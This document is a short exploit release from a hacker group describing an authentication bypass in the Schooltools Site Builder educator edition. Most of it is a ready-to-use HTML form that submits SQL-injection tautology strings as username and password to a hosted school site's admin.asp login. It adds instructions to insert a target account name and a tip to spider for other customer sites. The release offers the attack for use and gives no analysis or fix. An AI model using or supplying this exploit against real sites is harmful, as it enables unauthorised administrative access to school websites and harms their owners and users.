schooltools.htm.txt

`I MurderSkillz from www.g00ns.net have found a auth bypass vulnerability in Schooltools Site Builder - Educator Edition (Possibly other versions). The vulnerability takes place in admin.asp. I believe what http://schooltools.us does is they host their customers and they all have http://sites.schooltools.us/sites/[ACCOUNT]/admin.asp Of course u can do a website spider to get these other folders/websites cause if you put in http://sites.schooltools.us/sites/ you get access denied.  
  
Vuln found by MurderSkillz - g00ns.net  
HTML coded by uid0 - exploitercode.com  
  
Shoutz to all the g00ns and the ppl who fucking hate us =)  
  
<---Start HTML--->  
  
<style type="text/css">  
<!--  
body {  
background-color: #000000;  
}  
.style1 {  
font-family: Verdana, Arial, Helvetica, sans-serif;  
color: #FFFF00;  
}  
.style3 {font-family: Verdana, Arial, Helvetica, sans-serif; color: #FFFF00; font-weight: bold; }  
a:link {  
color: #FFFF00;  
}  
a:visited {  
color: #FFFF00;  
}  
a:hover {  
color: #FFFF00;  
}  
a:active {  
color: #FFFF00;  
}  
-->  
</style>  
<p><span class="style3"><a href="http://exploitercode.com" target="_blank">www.exploitercode.com</a> - <a href="http://www.g00ns.net" target="_blank">www.g00ns.net</a><br /><br />  
Schooltools Site Builder - Educator Edition (Possibly other versions)<br />Orignal exploit by MurderSkillz and uid0</span><br /><br />  
<span class="style1">To have this exploit work, edit the post action under the [ACCOUNT] brackets.</span>  
  
<form name='login' method='post' action='http://sites.schooltools.us/sites/[ACCOUNT]/admin.asp?Action=Login'>  
<input type="hidden" name='UserName' value="' or 'g00ns.net'='g00ns.net">  
<input type="hidden" name='PassWord' value="' or 'g00ns.net'='g00ns.net">  
<input type='submit' name='Submit' value='Login' class='button'>  
</p>  
  
<---END HTML--->`